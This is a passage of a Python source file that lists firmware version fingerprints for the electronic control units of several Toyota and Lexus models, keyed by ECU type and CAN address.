b'\x028646F0E02100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4803000\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.LEXUS_IS: {
(Ecu.engine, 0x700, None): [
b'\x018966353M7000\x00\x00\x00\x00',
b'\x018966353M7100\x00\x00\x00\x00',
b'\x018966353Q2000\x00\x00\x00\x00',
b'\x018966353Q2300\x00\x00\x00\x00',
b'\x018966353Q4000\x00\x00\x00\x00',
b'\x018966353R1100\x00\x00\x00\x00',
b'\x018966353R7100\x00\x00\x00\x00',
b'\x018966353R8100\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0232480000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02353P7000\x00\x00\x00\x00\x00\x00\x00\x00530J5000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02353P9000\x00\x00\x00\x00\x00\x00\x00\x00553C1000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152653300\x00\x00\x00\x00\x00\x00',
b'F152653301\x00\x00\x00\x00\x00\x00',
b'F152653310\x00\x00\x00\x00\x00\x00',
b'F152653330\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881515306200\x00\x00\x00\x00',
b'881515306400\x00\x00\x00\x00',
b'881515306500\x00\x00\x00\x00',
b'881515307400\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B53270\x00\x00\x00\x00\x00\x00',
b'8965B53271\x00\x00\x00\x00\x00\x00',
b'8965B53280\x00\x00\x00\x00\x00\x00',
b'8965B53281\x00\x00\x00\x00\x00\x00',
b'8965B53311\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F5301101\x00\x00\x00\x00',
b'8646F5301200\x00\x00\x00\x00',
b'8646F5301300\x00\x00\x00\x00',
b'8646F5301400\x00\x00\x00\x00',
],
},
CAR.PRIUS: {
(Ecu.engine, 0x700, None): [
b'\x02896634761000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634761100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634761200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634762000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634763000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634763100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634765000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634765100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634769000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634769100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634769200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634770000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634774000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634774100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634774200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634782000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x02896634784000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347A0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347A5000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347A8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x028966347B0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00',
b'\x03896634759100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634759200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634759200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634759300\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634760000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701002\x00\x00\x00\x00',
b'\x03896634760000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634760000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634760100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634760200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x03896634760200\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634760300\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701004\x00\x00\x00\x00',
b'\x03896634768000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703001\x00\x00\x00\x00',
b'\x03896634768000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703002\x00\x00\x00\x00',
b'\x03896634768100\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703002\x00\x00\x00\x00',
b'\x03896634785000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4705001\x00\x00\x00\x00',
b'\x03896634785000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
b'\x03896634786000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4705001\x00\x00\x00\x00',
b'\x03896634786000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
b'\x03896634789000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4703002\x00\x00\x00\x00',
b'\x038966347A3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4701003\x00\x00\x00\x00',
b'\x038966347A3000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4707001\x00\x00\x00\x00',
b'\x038966347B6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
b'\x038966347B7000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710001\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B47021\x00\x00\x00\x00\x00\x00',
b'8965B47022\x00\x00\x00\x00\x00\x00',
b'8965B47023\x00\x00\x00\x00\x00\x00',
b'8965B47050\x00\x00\x00\x00\x00\x00',
b'8965B47060\x00\x00\x00\x00\x00\x00', # This is the EPS with good angle sensor
],
(Ecu.esp, 0x7b0, None): [
b'F152647290\x00\x00\x00\x00\x00\x00',
b'F152647300\x00\x00\x00\x00\x00\x00',
b'F152647310\x00\x00\x00\x00\x00\x00',
b'F152647414\x00\x00\x00\x00\x00\x00',
b'F152647415\x00\x00\x00\x00\x00\x00',
b'F152647416\x00\x00\x00\x00\x00\x00',
b'F152647417\x00\x00\x00\x00\x00\x00',
b'F152647470\x00\x00\x00\x00\x00\x00',
b'F152647490\x00\x00\x00\x00\x00\x00',
b'F152647682\x00\x00\x00\x00\x00\x00',
b'F152647683\x00\x00\x00\x00\x00\x00',
b'F152647684\x00\x00\x00\x00\x00\x00',
b'F152647862\x00\x00\x00\x00\x00\x00',
b'F152647863\x00\x00\x00\x00\x00\x00',
b'F152647864\x00\x00\x00\x00\x00\x00',
b'F152647865\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514702300\x00\x00\x00\x00',
b'881514702400\x00\x00\x00\x00',
b'881514703100\x00\x00\x00\x00',
b'881514704100\x00\x00\x00\x00',
b'881514706000\x00\x00\x00\x00',
b'881514706100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4701300\x00\x00\x00\x00',
b'8646F4702001\x00\x00\x00\x00',
b'8646F4702100\x00\x00\x00\x00',
b'8646F4702200\x00\x00\x00\x00',
b'8646F4705000\x00\x00\x00\x00',
b'8646F4705200\x00\x00\x00\x00',
],
},
CAR.PRIUS_V: {
(Ecu.esp, 0x7b0, None): [
b'F152647280\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0234781000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514705100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4703300\x00\x00\x00\x00',
],
},
CAR.RAV4: {
(Ecu.engine, 0x7e0, None): [
b'\x02342Q1000\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q1100\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q1200\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q1300\x00\x00\x00\x00\x00\x00\x00\x0054212000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q2000\x00\x00\x00\x00\x00\x00\x00\x0054213000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q2100\x00\x00\x00\x00\x00\x00\x00\x0054213000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q2200\x00\x00\x00\x00\x00\x00\x00\x0054213000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342Q4000\x00\x00\x00\x00\x00\x00\x00\x0054215000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42063\x00\x00\x00\x00\x00\x00',
b'8965B42073\x00\x00\x00\x00\x00\x00',
b'8965B42082\x00\x00\x00\x00\x00\x00',
b'8965B42083\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F15260R102\x00\x00\x00\x00\x00\x00',
b'F15260R103\x00\x00\x00\x00\x00\x00',
b'F152642493\x00\x00\x00\x00\x00\x00',
b'F152642492\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514201200\x00\x00\x00\x00',
b'881514201300\x00\x00\x00\x00',
b'881514201400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4201100\x00\x00\x00\x00',
b'8646F4201200\x00\x00\x00\x00',
b'8646F4202001\x00\x00\x00\x00',
b'8646F4202100\x00\x00\x00\x00',
b'8646F4204000\x00\x00\x00\x00',
],
},
CAR.RAV4H: {
(Ecu.engine, 0x7e0, None): [
b'\x02342N9000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342N9100\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02342P0000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42102\x00\x00\x00\x00\x00\x00',
b'8965B42103\x00\x00\x00\x00\x00\x00',
b'8965B42112\x00\x00\x00\x00\x00\x00',
b'8965B42162\x00\x00\x00\x00\x00\x00',
b'8965B42163\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152642090\x00\x00\x00\x00\x00\x00',
b'F152642110\x00\x00\x00\x00\x00\x00',
b'F152642120\x00\x00\x00\x00\x00\x00',
b'F152642400\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881514202200\x00\x00\x00\x00',
b'881514202300\x00\x00\x00\x00',
b'881514202400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F4201100\x00\x00\x00\x00',
b'8646F4201200\x00\x00\x00\x00',
b'8646F4202001\x00\x00\x00\x00',
b'8646F4202100\x00\x00\x00\x00',
b'8646F4204000\x00\x00\x00\x00',
],
},
CAR.RAV4_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630R58000\x00\x00\x00\x00',
b'\x01896630R58100\x00\x00\x00\x00',
b'\x018966342E2000\x00\x00\x00\x00',
b'\x018966342M8000\x00\x00\x00\x00',
b'\x018966342S9000\x00\x00\x00\x00',
b'\x018966342T1000\x00\x00\x00\x00',
b'\x018966342T6000\x00\x00\x00\x00',
b'\x018966342T9000\x00\x00\x00\x00',
b'\x018966342U4000\x00\x00\x00\x00',
b'\x018966342U4100\x00\x00\x00\x00',
b'\x018966342U5100\x00\x00\x00\x00',
b'\x018966342V0000\x00\x00\x00\x00',
b'\x018966342V3000\x00\x00\x00\x00',
b'\x018966342V3100\x00\x00\x00\x00',
b'\x018966342V3200\x00\x00\x00\x00',
b'\x01896634A05000\x00\x00\x00\x00',
b'\x01896634A19000\x00\x00\x00\x00',
b'\x01896634A19100\x00\x00\x00\x00',
b'\x01896634A20000\x00\x00\x00\x00',
b'\x01896634A20100\x00\x00\x00\x00',
b'\x01896634A22000\x00\x00\x00\x00',
b'\x01896634A22100\x00\x00\x00\x00',
b'\x01896634A30000\x00\x00\x00\x00',
b'\x01896634A44000\x00\x00\x00\x00',
b'\x01896634A45000\x00\x00\x00\x00',
b'\x01896634A46000\x00\x00\x00\x00',
b'\x028966342M7000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x028966342T0000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x028966342V1000\x00\x00\x00\x00897CF1202001\x00\x00\x00\x00',
b'\x028966342Y8000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x02896634A18000\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x02896634A18100\x00\x00\x00\x00897CF1201001\x00\x00\x00\x00',
b'\x02896634A43000\x00\x00\x00\x00897CF4201001\x00\x00\x00\x00',
b'\x02896634A47000\x00\x00\x00\x00897CF4201001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F15260R210\x00\x00\x00\x00\x00\x00',
b'\x01F15260R220\x00\x00\x00\x00\x00\x00',
b'\x01F15260R290\x00\x00\x00\x00\x00\x00',
b'\x01F15260R300\x00\x00\x00\x00\x00\x00',
b'\x01F152642551\x00\x00\x00\x00\x00\x00',
b'\x01F152642561\x00\x00\x00\x00\x00\x00',
b'\x01F152642700\x00\x00\x00\x00\x00\x00',
b'\x01F152642701\x00\x00\x00\x00\x00\x00',
b'\x01F152642710\x00\x00\x00\x00\x00\x00',
b'\x01F152642711\x00\x00\x00\x00\x00\x00',
b'\x01F152642750\x00\x00\x00\x00\x00\x00',
b'\x01F152642751\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42170\x00\x00\x00\x00\x00\x00',
b'8965B42171\x00\x00\x00\x00\x00\x00',
b'8965B42180\x00\x00\x00\x00\x00\x00',
b'8965B42181\x00\x00\x00\x00\x00\x00',
b'\x028965B0R01200\x00\x00\x00\x008965B0R02200\x00\x00\x00\x00',
b'\x028965B0R01300\x00\x00\x00\x008965B0R02300\x00\x00\x00\x00',
b'\x028965B0R01400\x00\x00\x00\x008965B0R02400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4203200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203300\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203400\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203500\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203700\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4203800\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.RAV4H_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896634A15000\x00\x00\x00\x00',
b'\x018966342M5000\x00\x00\x00\x00',
b'\x018966342W8000\x00\x00\x00\x00',
b'\x018966342X5000\x00\x00\x00\x00',
b'\x018966342X6000\x00\x00\x00\x00',
b'\x01896634A25000\x00\x00\x00\x00',
b'\x018966342W5000\x00\x00\x00\x00',
b'\x028966342W4001\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x02896634A13000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02896634A13001\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896634A13101\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896634A14001\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x02896634A23000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x02896634A23001\x00\x00\x00\x00897CF1203001\x00\x00\x00\x00',
b'\x02896634A14001\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
b'\x02896634A14101\x00\x00\x00\x00897CF4801001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152642291\x00\x00\x00\x00\x00\x00',
b'F152642290\x00\x00\x00\x00\x00\x00',
b'F152642322\x00\x00\x00\x00\x00\x00',
b'F152642330\x00\x00\x00\x00\x00\x00',
b'F152642331\x00\x00\x00\x00\x00\x00',
b'F152642531\x00\x00\x00\x00\x00\x00',
b'F152642532\x00\x00\x00\x00\x00\x00',
b'F152642520\x00\x00\x00\x00\x00\x00',
b'F152642521\x00\x00\x00\x00\x00\x00',
b'F152642540\x00\x00\x00\x00\x00\x00',
b'F152642541\x00\x00\x00\x00\x00\x00',
b'F152642542\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B42170\x00\x00\x00\x00\x00\x00',
b'8965B42171\x00\x00\x00\x00\x00\x00',
b'8965B42180\x00\x00\x00\x00\x00\x00',
b'8965B42181\x00\x00\x00\x00\x00\x00',
b'\x028965B0R01200\x00\x00\x00\x008965B0R02200\x00\x00\x00\x00',
b'\x028965B0R01300\x00\x00\x00\x008965B0R02300\x00\x00\x00\x00',
b'\x028965B0R01400\x00\x00\x00\x008965B0R02400\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4203200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203300\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F4203400\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203500\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F4203700\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F4203800\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.SIENNA: {
(Ecu.engine, 0x700, None): [
b'\x01896630832100\x00\x00\x00\x00',
b'\x01896630832200\x00\x00\x00\x00',
b'\x01896630838000\x00\x00\x00\x00',
b'\x01896630838100\x00\x00\x00\x00',
b'\x01896630842000\x00\x00\x00\x00',
b'\x01896630843000\x00\x00\x00\x00',
b'\x01896630851000\x00\x00\x00\x00',
b'\x01896630851100\x00\x00\x00\x00',
b'\x01896630851200\x00\x00\x00\x00',
b'\x01896630852000\x00\x00\x00\x00',
b'\x01896630852100\x00\x00\x00\x00',
b'\x01896630859000\x00\x00\x00\x00',
b'\x01896630860000\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B45070\x00\x00\x00\x00\x00\x00',
b'8965B45080\x00\x00\x00\x00\x00\x00',
b'8965B45082\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152608130\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510801100\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702200\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0801100\x00\x00\x00\x00',
],
},
CAR.LEXUS_CTH: {
(Ecu.dsu, 0x791, None): [
b'881517601100\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152676144\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0237635000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F7601100\x00\x00\x00\x00',
],
},
CAR.LEXUS_ES_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x01896630EC9100\x00\x00\x00\x00',
b'\x018966333T5000\x00\x00\x00\x00',
b'\x018966333T5100\x00\x00\x00\x00',
b'\x018966333X6000\x00\x00\x00\x00',
b'\x01896633T07000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152606281\x00\x00\x00\x00\x00\x00',
b'\x01F152606340\x00\x00\x00\x00\x00\x00',
b'\x01F152606461\x00\x00\x00\x00\x00\x00',
b'\x01F15260E031\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33252\x00\x00\x00\x00\x00\x00',
b'8965B33590\x00\x00\x00\x00\x00\x00',
b'8965B33690\x00\x00\x00\x00\x00\x00',
b'8965B48271\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F33030D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3303200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3304100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F3304300\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.LEXUS_ESH_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x028966333S8000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x028966333S8000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966333T0100\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x028966333V4000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x02896633T09000\x00\x00\x00\x00897CF3307001\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633423\x00\x00\x00\x00\x00\x00',
b'F152633680\x00\x00\x00\x00\x00\x00',
b'F152633681\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33252\x00\x00\x00\x00\x00\x00',
b'8965B33590\x00\x00\x00\x00\x00\x00',
b'8965B33690\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F3301100\x00\x00\x00\x00',
b'\x018821F3301200\x00\x00\x00\x00',
b'\x018821F3301300\x00\x00\x00\x00',
b'\x018821F3301400\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F33030D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3303100\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3303200\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00',
b'\x028646F3304100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F3304200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
b'\x028646F3304300\x00\x00\x00\x008646G2601500\x00\x00\x00\x00',
],
},
CAR.LEXUS_ESH: {
(Ecu.engine, 0x7e0, None): [
b'\x02333M4200\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152633171\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881513310400\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B33512\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4701100\x00\x00\x00\x00',
b'8821F4701300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F3302001\x00\x00\x00\x00',
b'8646F3302200\x00\x00\x00\x00',
],
},
CAR.LEXUS_NX: {
(Ecu.engine, 0x700, None): [
b'\x01896637850000\x00\x00\x00\x00',
b'\x01896637851000\x00\x00\x00\x00',
b'\x01896637852000\x00\x00\x00\x00',
b'\x01896637854000\x00\x00\x00\x00',
b'\x01896637878000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152678130\x00\x00\x00\x00\x00\x00',
b'F152678140\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881517803100\x00\x00\x00\x00',
b'881517803300\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B78060\x00\x00\x00\x00\x00\x00',
b'8965B78080\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702100\x00\x00\x00\x00',
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F7801100\x00\x00\x00\x00',
b'8646F7801300\x00\x00\x00\x00',
],
},
CAR.LEXUS_NX_TSS2: {
(Ecu.engine, 0x700, None): [
b'\x018966378B2100\x00\x00\x00\x00',
b'\x018966378G3000\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'\x01F152678221\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B78120\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b"\x018821F3301400\x00\x00\x00\x00",
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F78030A0\x00\x00\x00\x008646G2601200\x00\x00\x00\x00',
b'\x028646F7803100\x00\x00\x00\x008646G2601400\x00\x00\x00\x00',
],
},
CAR.LEXUS_NXH: {
(Ecu.engine, 0x7e0, None): [
b'\x0237841000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237842000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237880000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237882000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0237886000\x00\x00\x00\x00\x00\x00\x00\x00A4701000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152678160\x00\x00\x00\x00\x00\x00',
b'F152678170\x00\x00\x00\x00\x00\x00',
b'F152678171\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881517804300\x00\x00\x00\x00',
b'881517804100\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B78060\x00\x00\x00\x00\x00\x00',
b'8965B78080\x00\x00\x00\x00\x00\x00',
b'8965B78100\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F7801300\x00\x00\x00\x00',
b'8646F7801100\x00\x00\x00\x00',
],
},
CAR.LEXUS_RC: {
(Ecu.engine, 0x7e0, None): [
b'\x0232484000\x00\x00\x00\x00\x00\x00\x00\x0052422000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.esp, 0x7b0, None): [
b'F152624221\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881512409100\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
